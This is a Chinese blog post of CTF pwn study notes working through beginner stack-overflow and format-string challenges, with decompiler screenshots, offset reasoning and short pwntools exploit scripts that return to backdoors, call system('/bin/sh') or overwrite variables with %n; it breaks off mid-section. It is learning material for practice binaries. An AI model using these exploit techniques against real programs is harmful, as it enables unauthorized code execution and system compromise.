<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="https://www.hualigs.cn/image/6015799666530.jpg">
  <link rel="icon" type="image/png" sizes="32x32" href="https://www.hualigs.cn/image/6015799666530.jpg">
  <link rel="icon" type="image/png" sizes="16x16" href="https://www.hualigs.cn/image/6015799666530.jpg">
  <link rel="mask-icon" href="https://www.hualigs.cn/image/6015799666530.jpg" color="#222">
  <link rel="manifest" href="https://www.hualigs.cn/image/6015799666530.jpg">
  <meta name="msapplication-config" content="https://www.hualigs.cn/image/6015799666530.jpg">

<link rel="stylesheet" href="/diazang/css/main.css">


<link rel="stylesheet" href="/diazang/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"jue-xian.gitee.io","root":"/diazang/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":true,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta name="description" content="简单栈溢出和简单格式化字符串例题以下是我花两天时间做的一些题目，选了几道来做笔记以备后用">
<meta property="og:type" content="article">
<meta property="og:title" content="栈溢出和格式化字符串">
<meta property="og:url" content="https://jue-xian.gitee.io/diazang/2021/02/09/pwn1/index.html">
<meta property="og:site_name" content="RUBIA">
<meta property="og:description" content="简单栈溢出和简单格式化字符串例题以下是我花两天时间做的一些题目，选了几道来做笔记以备后用">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://i.loli.net/2021/02/09/ARsx5GiPQErFt6w.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/TXlJBVkwgU3Fbfo.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/xNvELVfDm8wK6FY.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/6GEOBPynWV7eZiS.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/1Pn28FR7pimzNlb.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/aLQtEsBICnqdpgF.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/8pNsTKVfO3toPqX.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/2YAkpUoqGVn6zBy.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/LMNxK6ERFCbJs8V.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/ofwY5tXaDHy6NJs.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/aLUkGAWtONSpq5b.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/zIleBpFECwAJ7Q3.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/yJhTDksLW1tOCIB.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/eHAZNU3y6vFQ1lS.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/wyYeiU2JQz5Ef83.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/caYUXFgmbwoIhTs.png">
<meta property="og:image" content="https://imgconvert.csdnimg.cn/aHR0cHM6Ly90dmExLnNpbmFpbWcuY24vbGFyZ2UvMDA4MzFyU1RseTFnZDdkZzl0bXoyajMwa3cwODJxM3YuanBn?x-oss-process=image/format,png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/dI1EZUopwOYNHMe.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/stFxqgnW2vMHCLI.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/aLXRmZwPbAtixkQ.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/Rwa4TYNfxlBtP75.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/XAanyxqwzNsUhgJ.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/AjZ8hrm2dBH5NP9.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/8XRvTVEyMaj4mlA.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/EvFeIlUs9JY4rDP.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/MVrXditk5PgbzGy.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/zaAbhgUK9YSkvCZ.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/I12aOjkyhDSxKlA.png">
<meta property="og:image" content="https://i.loli.net/2021/02/10/528lHjhuTqpkNWi.png">
<meta property="article:published_time" content="2021-02-09T15:46:33.000Z">
<meta property="article:modified_time" content="2021-02-11T10:57:53.157Z">
<meta property="article:author" content="H.R.P">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2021/02/09/ARsx5GiPQErFt6w.png">

<link rel="canonical" href="https://jue-xian.gitee.io/diazang/2021/02/09/pwn1/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>栈溢出和格式化字符串 | RUBIA</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/diazang/atom.xml" title="RUBIA" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/diazang/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">RUBIA</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/diazang/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/diazang/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/diazang/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/diazang/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/diazang/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-schedule">

    <a href="/diazang/schedule/" rel="section"><i class="fa fa-calendar fa-fw"></i>日程表</a>

  </li>
        <li class="menu-item menu-item-sitemap">

    <a href="/diazang/sitemap.xml" rel="section"><i class="fa fa-sitemap fa-fw"></i>站点地图</a>

  </li>
        <li class="menu-item menu-item-commonweal">

    <a href="/diazang/404/" rel="section"><i class="fa fa-heartbeat fa-fw"></i>公益 404</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://jue-xian.gitee.io/diazang/2021/02/09/pwn1/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="https://www.hualigs.cn/image/6015786be4309.jpg">
      <meta itemprop="name" content="H.R.P">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="RUBIA">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          栈溢出和格式化字符串
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>

              <time title="创建时间：2021-02-09 23:46:33" itemprop="dateCreated datePublished" datetime="2021-02-09T23:46:33+08:00">2021-02-09</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">更新于</span>
                <time title="修改时间：2021-02-11 18:57:53" itemprop="dateModified" datetime="2021-02-11T18:57:53+08:00">2021-02-11</time>
              </span>

          
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/diazang/2021/02/09/pwn1/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/diazang/2021/02/09/pwn1/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h1 id="简单栈溢出和简单格式化字符串例题"><a href="#简单栈溢出和简单格式化字符串例题" class="headerlink" title="简单栈溢出和简单格式化字符串例题"></a>简单栈溢出和简单格式化字符串例题</h1><p>以下是我花两天时间做的一些题目，选了几道来做笔记以备后用</p>
<a id="more"></a>

<p>先来看最简单的          </p>
<h2 id="后门类无防护夺权"><a href="#后门类无防护夺权" class="headerlink" title="后门类无防护夺权"></a>后门类无防护夺权</h2><p><img src="https://i.loli.net/2021/02/09/ARsx5GiPQErFt6w.png" alt="1.jpg"></p>
<p>F5反汇编后看见有gets函数然后看了看plt表我们发现了个fun函数</p>
<p><img src="https://i.loli.net/2021/02/10/TXlJBVkwgU3Fbfo.png" alt="2.jpg"></p>
<p>发现了bin\sh那我们就直接利用栈溢出漏洞</p>
<p><img src="https://i.loli.net/2021/02/10/xNvELVfDm8wK6FY.png" alt="3.jpg"></p>
<p>点击v4看见其地址为0X0F</p>
<p>之后找到fun函数的地址</p>
<p><img src="https://i.loli.net/2021/02/10/6GEOBPynWV7eZiS.png" alt="4.jpg"></p>
<p>由此payload便可以开始构建了</p>
<p>payload=b’a’*(0x0f+0x08)+p64(0x0401186)</p>
<p>完整exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#r=remote(&quot;node3.buuoj.cn&quot;,26551)</span></span><br><span class="line">r=process(<span class="string">&#x27;./pwn1&#x27;</span>)</span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x0F</span>+<span class="number">0x08</span>)+p64(<span class="number">0x0401186</span>)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<p>执行脚本cat flag 就OK啦</p>
<h2 id="字符串替换类栈溢出"><a href="#字符串替换类栈溢出" class="headerlink" title="字符串替换类栈溢出"></a>字符串替换类栈溢出</h2><p>这个题是C++编写的我就遇见过一次，蛮好玩的，开始不认真还不会呢</p>
<p>题源<a target="_blank" rel="noopener" href="https://buuoj.cn/challenges#pwn1_sctf_2016%E9%87%8C%E9%9D%A2%E7%9A%84%E7%AC%AC%E5%9B%9B%E9%A2%98">https://buuoj.cn/challenges#pwn1_sctf_2016里面的第四题</a></p>
<p>上图看反汇编伪代码</p>
<p><img src="https://i.loli.net/2021/02/10/1Pn28FR7pimzNlb.png" alt="5.jpg"></p>
<p>这主函数是非常干净啊我们去看子函数vuln</p>
<p><img src="https://i.loli.net/2021/02/10/aLQtEsBICnqdpgF.png" alt="6.jpg"></p>
<p>这里重点在于我箭头所指向的两行代码，输入I全部会替换成you</p>
<p>我们在看看fgets函数那对变量s限制输入32个字母，看注释可以知道</p>
<p>s的空间大小是60，刚好上面I替换you可以利用下</p>
<p>我们输入20个I就可以使其造成栈溢出</p>
<p>点击s可以看见s地址（我就懒得弄了直接上payload）</p>
<p>get_flag=0x08048fd#这个函数里面有cat flag.txt</p>
<p>payload=b’I’ * 20+b’a’ * 4+p32(get_flag)</p>
<p>所以完成exp如下</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r=process(<span class="string">&#x27;./tihuan&#x27;</span>)</span><br><span class="line"></span><br><span class="line">get_flag=<span class="number">0x08048fd</span><span class="comment">#这个函数里面有cat flag.txt</span></span><br><span class="line"></span><br><span class="line">payload=<span class="string">b&#x27;I&#x27;</span> * <span class="number">20</span>+<span class="string">b&#x27;a&#x27;</span> * <span class="number">4</span>+p32(get_flag)</span><br><span class="line"></span><br><span class="line">r.sendline(payload)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>


<h2 id="虚假后门类"><a href="#虚假后门类" class="headerlink" title="虚假后门类"></a>虚假后门类</h2><p>第一种后门类他是有可以直接点</p>
<p>第二种虚假后门就要多花上几秒钟</p>
<p>先看主函数</p>
<p><img src="https://i.loli.net/2021/02/10/8pNsTKVfO3toPqX.png" alt="7.png"></p>
<p>一如既往的空空如也关键的在于vul和door函数</p>
<p>后门类的door直接就抓取flag了这里就比较皮┗|｀O′|┛ 嗷~~</p>
<p><img src="https://i.loli.net/2021/02/10/2YAkpUoqGVn6zBy.png" alt="8.jpg"></p>
<p>遇见这个我们思路就是先看看他有没有/bin/sh</p>
<p>同时按下shift F12可以查找有没有bin/sh</p>
<p>刚好这题有（要没有我这菜鸡现在还做不来）</p>
<p><img src="https://i.loli.net/2021/02/10/LMNxK6ERFCbJs8V.png" alt="9.png"></p>
<p>然后双击查看其地址</p>
<p><img src="https://i.loli.net/2021/02/10/ofwY5tXaDHy6NJs.png" alt="10.jpg"></p>
<p>bin=0x0804a02c</p>
<p>我们接下来再看看 __system的地址(这里要注意还有一个system那个不是我们要的我们要的是_ _system)</p>
<p>如图</p>
<p><img src="https://i.loli.net/2021/02/10/aLUkGAWtONSpq5b.png" alt="11.jpg"></p>
<p>_system=0x08048400</p>
<p>之后我们回到vul函数看gets函数里面变量的地址</p>
<p><img src="https://i.loli.net/2021/02/10/zIleBpFECwAJ7Q3.png" alt="12.jpg"></p>
<p>so 直接上exp:</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#r=remote(&quot;49.234.71.236&quot;,28000)</span></span><br><span class="line">r.process(<span class="string">&#x27;./ks4&#x27;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;ID:&quot;</span>)</span><br><span class="line">r.sendline(<span class="string">&#x27;aaa&#x27;</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;PW:&quot;</span>)</span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x0d0</span>+<span class="number">0x04</span>)+p32(<span class="number">0x08048400</span>)+p32(<span class="number">0xdeadbeef</span>)+p32(<span class="number">0x0804a02c</span>)</span><br><span class="line"></span><br><span class="line"><span class="string">&quot;&quot;&quot;0xdeadbeef是用来返回的时候任意地址跳转用的(这个看情况用不是所有的栈溢出题都要的，具体下次写文章总结)&quot;&quot;&quot;</span></span><br><span class="line"></span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>
<p>​                  </p>
<h2 id="数字覆盖类栈溢出"><a href="#数字覆盖类栈溢出" class="headerlink" title="数字覆盖类栈溢出"></a>数字覆盖类栈溢出</h2><p>这个题是我在靶场随便扒拉的一个，我先讲解这个然后攻防世界有类似的</p>
<p>pwn的新手区 第三题 when did you born有兴趣的自己去康康</p>
<p>下面开始讲解</p>
<p><img src="https://i.loli.net/2021/02/10/yJhTDksLW1tOCIB.png" alt="13.jpg"></p>
<p>主函数比较特殊的就func函数我们先去康康</p>
<p><img src="https://i.loli.net/2021/02/10/eHAZNU3y6vFQ1lS.png" alt="14.jpg"></p>
<p>可以看见啊这个v2是float型 v1int型</p>
<p>然后gets是v1但是判断要用v2才可以判断</p>
<p>很多萌新就不懂 这个，但是今天我马保国(不是)就来讲讲</p>
<p>我们点击 v1看看他的地址0x030</p>
<p>v2地址0x04</p>
<p>虽然我们输入用的变量是v1但是我们可以填充字符跳到v2去啊</p>
<p>然后再传递题目要的11.28125</p>
<p>这个是要转成16进制的</p>
<p>这里给大家个网站很方便</p>
<p><a target="_blank" rel="noopener" href="https://lostphp.com/hexconvert/(%E8%BF%99%E4%B8%AA%E5%8F%AF%E4%BB%A5%E8%BD%AC%E5%8C%9610%E8%BF%9B%E5%88%B6%E6%B5%AE%E7%82%B9%E6%95%B0%E7%9A%84%E5%93%A6)">https://lostphp.com/hexconvert/(这个可以转化10进制浮点数的哦)</a></p>
<p>直接上exp了</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#r=process(&#x27;./cq&#x27;)</span></span><br><span class="line">r=remote(<span class="string">&#x27;node3.buuoj.cn&#x27;</span>,<span class="number">29527</span>)</span><br><span class="line">r.recvuntil(<span class="string">&quot;Let&#x27;s guess the number.&quot;</span>)</span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x030</span>-<span class="number">0x04</span>)+p64(<span class="number">0x41348000</span>)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">r.interactive()  </span><br></pre></td></tr></table></figure>


<h2 id="绕过字符大小条件限制类栈溢出"><a href="#绕过字符大小条件限制类栈溢出" class="headerlink" title="绕过字符大小条件限制类栈溢出"></a>绕过字符大小条件限制类栈溢出</h2><p>说道这个我就很气自己C语言不老实学基础空中楼阁</p>
<p>看见无符号整形unsigned_int8还想不起来它最大长度是255（1111 1111）</p>
<p>好了咱进入正题</p>
<p>上主函数图</p>
<p><img src="https://i.loli.net/2021/02/10/wyYeiU2JQz5Ef83.png" alt="15.png"></p>
<p>第一眼就看中了这个名字检查函数</p>
<p>不过我们先看看这个buf数组看注释给了408长度但是这个名字检查函数限定只能用400个长度这里不能搞事情</p>
<p>我们把注意力放到这个名字检查函数上</p>
<p>点击进去康康嗷</p>
<p><img src="https://i.loli.net/2021/02/10/caYUXFgmbwoIhTs.png" alt="16.png"></p>
<p>关于unsigned_int8</p>
<p>这里补充一点知识</p>
<p><img src="https://imgconvert.csdnimg.cn/aHR0cHM6Ly90dmExLnNpbmFpbWcuY24vbGFyZ2UvMDA4MzFyU1RseTFnZDdkZzl0bXoyajMwa3cwODJxM3YuanBn?x-oss-process=image/format,png" alt="image-20200326154118709"></p>
<p>如图所示嗷</p>
<p>好了咱继续，可以看见函数图里面if判断v3只能在4~7之间</p>
<p>我们的v3上限是255</p>
<p>那么想要整形溢出范围就要控制在259~262之间的字符长度来填充</p>
<p>这里先放着记着这点</p>
<p>接下来我们去看这个函数底部strcpy函数把s的值给到dest</p>
<p>我们去康康dest地址</p>
<p><img src="https://i.loli.net/2021/02/10/dI1EZUopwOYNHMe.png" alt="17.png"></p>
<p>dest离返回地址距离0x011+0x04=0x015</p>
<p>然后老样子捞个后门上来玩玩</p>
<p><img src="https://i.loli.net/2021/02/10/stFxqgnW2vMHCLI.png" alt="18.png"></p>
<p>getshell=0x0804858b </p>
<p>然后我直接上payload先讲解下这个payload构建</p>
<p>payload=b’a’<em>(0x011+0x04)+p32(0x0804858b)+b’a’</em>(261-0x015-4)</p>
<p>首先字符串填充然后传入后门地址这两个没什么好说的，重点是后门的那块</p>
<p>用来绕过if判断的整型溢出的字符串填充</p>
<p>我们上面提到了判断后范围应当在259-262之间我选261</p>
<p>刚才填充了21个a覆盖到返回地址然后传入4个字节的getshell</p>
<p>（0x8b 0x85 0x04 0x08）</p>
<p>所以要先回到传入地址再减去这四个字节来绕过if判断</p>
<p>说完了直接上exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#r=remote(&quot;node3.buuoj.cn&quot;,28682)</span></span><br><span class="line">r=process(<span class="string">&#x27;./r2t3&#x27;</span>)</span><br><span class="line">payload=<span class="string">b&#x27;a&#x27;</span>*(<span class="number">0x011</span>+<span class="number">0x04</span>)+p32(<span class="number">0x0804858b</span>)+<span class="string">b&#x27;a&#x27;</span>*(<span class="number">261</span>-<span class="number">0x015</span>-<span class="number">4</span>)</span><br><span class="line">r.sendline(payload)</span><br><span class="line">print(r.recv())</span><br><span class="line">r.interactive()</span><br></pre></td></tr></table></figure>


<h2 id="格式化字符串最简单的一道题"><a href="#格式化字符串最简单的一道题" class="headerlink" title="格式化字符串最简单的一道题"></a>格式化字符串最简单的一道题</h2><p>先来道长信心的题目(我入坑没碰见这么长信心的题)</p>
<p><a target="_blank" rel="noopener" href="http://ctf.mrskye.cn靶场地址/">http://ctf.mrskye.cn靶场地址</a> format1</p>
<p>来看看主函数QWQ</p>
<p><img src="https://i.loli.net/2021/02/10/aLXRmZwPbAtixkQ.png" alt="19.png"></p>
<p>一眼望去只有那个printf不对劲但是又没什么函数利用</p>
<p>然后我就看看有没有bin\sh之类的果然有个flag可是没有后门</p>
<p>我就直接按常规路子走一趟了</p>
<p><img src="https://i.loli.net/2021/02/10/Rwa4TYNfxlBtP75.png" alt="20.png"></p>
<p>先连接上看看</p>
<p><img src="https://i.loli.net/2021/02/10/XAanyxqwzNsUhgJ.png" alt="21.png"></p>
<p>直接很常规的啦本来想看可利用变量的偏移值结果直接给我爆装备了</p>
<h2 id="简单格式化字符串题目"><a href="#简单格式化字符串题目" class="headerlink" title="简单格式化字符串题目"></a>简单格式化字符串题目</h2><p>有一说一目前碰见的格式化字符串我都是用一个函数搞定的，</p>
<p>我先不说卖个关子，先来常规写法</p>
<h3 id="大数覆盖类"><a href="#大数覆盖类" class="headerlink" title="大数覆盖类"></a>大数覆盖类</h3><p>这题在攻防世界pwn新手区CGFSB我拿这个举例子吧</p>
<p><img src="https://i.loli.net/2021/02/10/AjZ8hrm2dBH5NP9.png" alt="22.png"></p>
<p>主函数内容是输入两次数据输出两次并且有个抓取flag的判断</p>
<p>第二次输出的massage那个有格式化字符串漏洞整他丫的</p>
<p>先连接上常规探查下</p>
<p><img src="https://i.loli.net/2021/02/10/8XRvTVEyMaj4mlA.png" alt="23.png"></p>
<p>%p作用在于输出地址方便查看可利用变量的偏移值</p>
<p>aaa对应就是0x20616161这个从左数到他共10个（包括他本身哦）</p>
<p>所以偏移为10</p>
<p>然后我们要利用的变量是pwnme所以我们去找他的地址</p>
<p>pwnme=0x0804a068这个家伙是4个字节的</p>
<p>题目要求是8所以后面要加上4个字符凑数，然后再利用任意地址读取修改</p>
<p>payload=p32（pwnme）+b’a’*4+b’%10$n’</p>
<p>exp</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">r=process(<span class="string">&#x27;./cgfsb&#x27;</span>)</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">&quot;please tell me your name:&quot;</span>)</span><br><span class="line"></span><br><span class="line">r.sendline(<span class="string">&#x27;aaa&#x27;</span>)</span><br><span class="line"></span><br><span class="line">r.recvuntil(<span class="string">&quot;leave your message please:&quot;</span>)</span><br><span class="line"></span><br><span class="line">payload=p32（pwnme）+<span class="string">b&#x27;a&#x27;</span>*<span class="number">4</span>+<span class="string">b&#x27;%10$n&#x27;</span></span><br><span class="line"></span><br><span class="line">r.sendline(payload)</span><br><span class="line"></span><br><span class="line">r.interactive()</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<h3 id="小数覆盖"><a href="#小数覆盖" class="headerlink" title="小数覆盖"></a>小数覆盖</h3><p>小数覆盖比较不一样</p>
<p>所谓小数覆盖就是比如我判断变量地址是4，结果好家伙要求来个2才满足判断，这个时候</p>
<p>你不能疯狂加了吧，而且python语法没有字符串的减法!</p>
<p>我先上段资料<a target="_blank" rel="noopener" href="https://ctf-wiki.org/pwn/linux/fmtstr/fmtstr_exploit/#_14">https://ctf-wiki.org/pwn/linux/fmtstr/fmtstr_exploit/#_14</a></p>
<p>相关知识覆盖小数字这里都有</p>
<p>例题地址<a target="_blank" rel="noopener" href="http://ctf.mrskye.cn/challenges">http://ctf.mrskye.cn/challenges</a> format5</p>
<p>上主函数图</p>
<p><img src="https://i.loli.net/2021/02/10/EvFeIlUs9JY4rDP.png" alt="24.png"></p>
<p>如图v2=0x0804a06c(四字节，题目要求v2=2哇哦自闭了刚开始)</p>
<p>如果v2=2直接输出flag</p>
<p>我们先常规探查，发现可利用变量buf偏移值为6先记下</p>
<p><img src="https://i.loli.net/2021/02/10/MVrXditk5PgbzGy.png" alt="25.png"></p>
<p>然后因为这个小数字覆盖的特殊性</p>
<p>payload=b’aa%8$naa’+p32(v2)</p>
<p>其中任意地址读取这个必须放开头</p>
<p>然后虽然一开始我们查看到偏移值是6 按道理应该是</p>
<p>‘aa%6$naa’ 变成8是因为题目要求是v2=2</p>
<p>我们添加两个字符作为值传递，那么就会占位所以后移动2个</p>
<p>就是’aa%8$naa’这样了</p>
<p>小数覆盖通用任意地址读取通用格式</p>
<p>‘要求字符数量%$（原偏移量+要求字符数量）n要求字符数量’</p>
<p>上完整exp</p>
<p>from pwn import *<br>r=remote(“49.234.71.236”,28624)<br>r.recvuntil(“input:”)<br>payload=b’aa%8$naa’+p32(0x0804a06c)<br>r.sendline(payload)<br>r.interactive()</p>
<h3 id="万金油简单格式化字符串"><a href="#万金油简单格式化字符串" class="headerlink" title="万金油简单格式化字符串"></a>万金油简单格式化字符串</h3><p>介绍个格式化字符串利器fmtstr_payload()</p>
<p>先上例题讲解用法</p>
<p><a target="_blank" rel="noopener" href="https://buuoj.cn/challenges#%E7%A9%BA%E9%97%B4%E5%AF%B9%E5%86%B3pwn5">https://buuoj.cn/challenges#空间对决pwn5</a></p>
<p>先看主函数</p>
<p><img src="https://i.loli.net/2021/02/10/zaAbhgUK9YSkvCZ.png" alt="26.jpg"></p>
<p>两个亮点第一个格式化字符串漏洞，还有一个数值判断通过后抓flag的</p>
<p>先看整体意思</p>
<p>输入你的名字</p>
<p>输出你的名字</p>
<p>输入你的密码</p>
<p>如果输入的密码==unk_804c044这个变量就给我们flag</p>
<p>但是我们发现了个问题unk_804c044是从服务器那得到的呀我们不知道</p>
<p>但是密码是我们自己定的^_^</p>
<p>所以我们就利用格式化字符串漏洞修改这个值</p>
<p>ok，题目看完了，常规探查</p>
